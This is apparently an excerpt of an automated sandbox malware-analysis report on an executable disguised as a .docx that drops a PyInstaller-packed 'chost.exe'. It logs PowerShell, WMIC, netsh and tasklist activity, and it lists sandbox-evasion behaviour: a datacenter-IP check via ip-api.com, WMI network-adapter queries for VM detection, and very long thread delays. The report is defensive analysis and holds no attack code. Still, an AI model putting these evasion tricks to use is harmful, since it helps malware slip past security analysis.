Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Window / User API: threadDelayed 2977	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 587	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2933	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6900	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4253	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5531	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4617
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4611
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7675
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1873
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5983
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2328
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3277
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2533
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 841

Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
